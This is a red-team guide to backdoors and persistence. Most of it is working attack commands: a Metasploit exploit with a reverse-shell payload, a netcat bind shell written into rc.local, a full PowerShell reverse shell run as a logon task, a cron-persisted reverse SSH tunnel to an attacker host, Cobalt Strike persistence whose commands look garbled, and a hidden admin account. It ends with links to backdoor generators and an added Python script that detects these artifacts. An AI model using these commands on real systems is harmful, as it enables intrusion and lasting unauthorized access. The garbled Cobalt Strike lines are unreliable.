Backdoors

Practical Guide to Backdoors in Red Teaming

Backdoors are tools or methods used by attackers to maintain persistent access to a compromised system. In a red teaming context, backdoors allow penetration testers to ensure they can return to a system even if the initial access vector is closed. Below, we'll explore practical techniques for implementing and using backdoors.

Creating a Persistent Meterpreter Session

Tool: Metasploit

Steps:

  • Exploit a vulnerability to gain an initial foothold.

  • Migrate to a stable process to maintain the session.

  • Set up persistence with a Meterpreter script.

use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
exploit

Once the session is established:

meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.1.101

This command sets up a persistent Meterpreter backdoor that will start every time the user logs in.

Using Netcat for a Simple Backdoor

Tool: Netcat

Steps:

  • Transfer Netcat to the target system.

  • Set up a persistent listener on the target system.

Example:

nc -lvp 4444 -e /bin/bash

To make it persistent, add the command to a startup script:

echo 'nc -lvp 4444 -e /bin/bash' >> /etc/rc.local

Using PowerShell for Windows Persistence

Tool: PowerShell

Steps:

  • Create a PowerShell script to establish a reverse shell.

  • Use Task Scheduler to run the script at startup.

Example:

$client = New-Object System.Net.Sockets.TCPClient("192.168.1.101", 4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2 = $sendback + "PS " + (pwd).Path + "> "
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte, 0, $sendbyte.Length)
    $stream.Flush()
}
$client.Close()

Save this script and schedule it using Task Scheduler:

schtasks /create /sc onlogon /tn "PowerShell Backdoor" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\path\to\script.ps1"

Creating a Reverse SSH Tunnel

Tool: SSH

Steps:

  • Set up a reverse SSH tunnel to maintain access.

Example:

ssh -R 9090:localhost:22 user@attacker-machine.com

To make it persistent, add the command to cron:

(crontab -l ; echo "@reboot ssh -R 9090:localhost:22 user@attacker-machine.com") | crontab -

Deploying a Custom Backdoor with a C2 Framework

Tool: Cobalt Strike

Steps:

  • Use Cobalt Strike to create a custom beacon.

  • Deploy the beacon on the target system and set it to call back periodically.

Example:

./teamserver <external IP> <password>
./agscript
> spawnb 192.168.1.100

In Cobalt Strike:

beacon> run persistence -script windows/beacon.exe -args 192.168.1.101 4444

Hidden User Accounts: Creating hidden user accounts with elevated privileges.

Example: Creating a Hidden Admin User on Windows:

net user hiddenadmin P@ssw0rd /add
net localgroup administrators hiddenadmin /add

Impact: The hidden user account provides the attacker with administrative access.
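Each technique above leaves an artifact a blue team can audit for. The following script is an added example, not code from the original page: it flags the netcat bind shell appended to rc.local, the @reboot reverse SSH tunnel in cron, a logon-triggered scheduled task that runs a PowerShell script with -ExecutionPolicy Bypass, and a local Administrators member missing from an approved baseline. The host name WS01, the task records, and the account lists are constructed samples, and the schtasks parser assumes the field layout of `schtasks /query /fo LIST /v` output.

```python
import re

# Regexes for the persistence artifacts this page describes: netcat bind shell in
# rc.local, @reboot reverse SSH tunnel in cron, PowerShell task with a bypassed policy.
RULES = {
    "netcat_bind_shell": re.compile(r"\bnc(?:at)?\b.*\s-[lvpn]+\b.*\s-[ec]\s+/bin/(?:ba|da)?sh\b"),
    "reboot_reverse_ssh": re.compile(r"^\s*@reboot\b.*\bssh\b.*\s-R\s*\d+:"),
    "powershell_bypass_file": re.compile(r"powershell(?:\.exe)?\b.*-ExecutionPolicy\s+Bypass\b.*-File\b", re.I),
}

def scan_lines(source, text):
    """Return (source, rule, line) for every line matching one of RULES. A line is
    flagged even after 'exit 0' in rc.local: the artifact itself is the indicator."""
    hits = []
    for line in text.splitlines():
        for name, rx in RULES.items():
            if rx.search(line):
                hits.append((source, name, line.strip()))
    return hits

def parse_schtasks_list(text):
    """Parse 'schtasks /query /fo LIST /v' style output into one dict per task."""
    tasks = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = (line.partition(":") for line in block.splitlines())
        tasks.append({k.strip(): v.strip() for k, _, v in fields})
    return tasks

def logon_tasks_running_powershell(text):
    """Names of logon-triggered tasks whose action matches the bypass-policy rule."""
    rx = RULES["powershell_bypass_file"]
    return [t.get("TaskName") for t in parse_schtasks_list(text)
            if "logon" in t.get("Schedule Type", "").lower()
            and rx.search(t.get("Task To Run", ""))]

def unexpected_admins(current, baseline):
    """Local Administrators members absent from the approved baseline (case-insensitive)."""
    return sorted({a.lower() for a in current} - {b.lower() for b in baseline})

# Constructed sample artifacts (hypothetical host WS01, not real output).
RC_LOCAL = "#!/bin/sh -e\nexit 0\nnc -lvp 4444 -e /bin/bash\n"
CRONTAB = "0 3 * * * /usr/local/bin/backup.sh\n@reboot ssh -R 9090:localhost:22 user@attacker-machine.com\n"
SCHTASKS = ("HostName:      WS01\nTaskName:      \\PowerShell Backdoor\n"
            "Task To Run:   powershell.exe -ExecutionPolicy Bypass -File C:\\path\\to\\script.ps1\n"
            "Schedule Type: At logon time\n\n"
            "HostName:      WS01\nTaskName:      \\Microsoft\\Windows\\Defrag\\ScheduledDefrag\n"
            "Task To Run:   %windir%\\system32\\defrag.exe -c -h -o -$\nSchedule Type: Weekly\n")
LOCAL_ADMINS, BASELINE_ADMINS = ["Administrator", "hiddenadmin"], ["Administrator"]
```

Run `scan_lines` over real rc.local and crontab contents and `logon_tasks_running_powershell` over real `schtasks` output; the baseline for `unexpected_admins` should come from a known-good build image rather than the host being checked.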

Some useful Backdoor references:

  • GitHub - screetsec/TheFatRat: TheFatRat, a massive exploiting tool: an easy tool to generate backdoors and to run post-exploitation attacks such as browser attacks. It compiles malware with a popular payload that can then be executed on Windows, Android and Mac; the malware it creates is also able to bypass most AV protection.

  • GitHub - karma9874/AndroRAT: A simple Android remote administration tool using sockets. It uses Java on the client side and Python on the server side.

  • GitHub - n1nj4sec/pupy: Pupy is an open-source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool, mainly written in Python.

Understanding and effectively implementing persistence and backdoor techniques is critical for simulating advanced attack scenarios in red teaming engagements. While common backdoors are increasingly detected by EDRs, some methods can still circumvent these defences using advanced red teaming techniques that we cover in our live Red Teaming workshops.

Last updated 11 months ago